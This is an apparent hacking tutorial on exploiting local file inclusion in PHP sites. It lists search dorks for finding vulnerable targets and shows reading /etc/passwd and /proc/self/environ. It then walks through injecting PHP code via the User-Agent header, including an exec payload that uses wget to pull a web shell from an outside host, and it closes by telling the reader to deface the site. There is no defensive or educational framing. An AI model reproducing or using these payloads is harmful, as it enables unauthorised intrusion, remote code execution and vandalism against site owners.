Requirements :
—————

> Tamper data plugin (Download : https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ )
> Dorks for finding vulnrable websites

inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=

Or

use following LFI scanning perl script for finding /etc/psswd and /proc/self/environ directories.

(Download LFI scanning script: http://pastebin.com/fjDN4iM5 )



LFI vulnerable website URL looks like this:

Code:
www.website.com/index.php?page=/etc/passwd
Great !!, now you are sure that website is vulnerable.
Now check for /proc/self/environ
So change your path to /proc/self/environ



Click Start Tamper, and refresh your page.
Step 1.
==========

In the User-Agent field, type this
<?php phpinfo();?>



it will show php server info on the web page .



Step 2.
==========

Now we can execute code, so let’s upload upload your shell
Open TamperData again, click start tamper, and refresh website. and This time in the User-Agent enter this
<?exec(‘wget http://www.site.com/shell.txt -O shell.php’);?>


it will show the shell on the webpage…yohaa  )

Deface the website

Note:
—–
Here use a shelled website you can upload shell to

http://www.pastehtml.com